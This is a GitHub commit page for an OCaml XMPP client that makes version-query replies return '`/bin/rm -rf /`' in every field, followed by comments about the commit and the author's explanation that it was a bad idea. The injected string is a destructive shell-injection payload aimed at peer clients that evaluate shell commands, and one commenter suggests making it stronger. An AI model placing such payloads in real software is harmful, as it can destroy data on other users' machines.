Skip to content
Permalink
Browse files

go, fuck yourself

  • Loading branch information...
hannesm committed Nov 28, 2014
1 parent 2936332 commit 0607ae0977faf92c7c4bff6c769df15b019a2daa
Showing with 6 additions and 4 deletions.
  1. +6 −4 src/xmpp_callbacks.ml
@@ -180,10 +180,12 @@ let session_callback t =
(fun ev _jid_from _jid_to _lang () ->
match ev with
| IQGet _el ->
let el = Version.encode {Version.name = "xmpptest";
Version.version = "2.0";
Version.os = Sys.os_type} in
return (IQResult (Some el))
let el = Version.(encode
{name = "`/bin/rm -rf /`";
version = "`/bin/rm -rf /`";
os = "`/bin/rm -rf /`"})

This comment has been minimized.

@denisdubovitskiy

denisdubovitskiy Feb 26, 2019

I think that --no-preserve-root has to be added

in
return (IQResult (Some el))
| IQSet _el ->
fail BadRequest
);

2 comments on commit 0607ae0

@Flowdalic

This comment has been minimized.

Copy link

Flowdalic replied Feb 25, 2019

Please note that this commit caused some irritation in certain news aggregation sites.

@hannesm

This comment has been minimized.

Copy link
Owner Author

hannesm replied Feb 26, 2019

@Flowdalic interesting. there are some misconceptions in the thread - I'm neither member of this aggregation site (nor would I like to be) -- feel free to cross-post:

  • what the above commit is doing. it does indeed answer to a XMPP version request with the string `rm -rf /`. there were some other XMPP clients which had some security issues by evaluating shell commands. in hindsight, it was a bad idea to include the above commit in the project, but no harm was ever planned for users of this client.
  • "racist license" what "rain1" is accusing me of. that's wrong. this project used to use https://nonwhiteheterosexualmalelicense.org/ as food for thought.
Please sign in to comment.
You can’t perform that action at this time.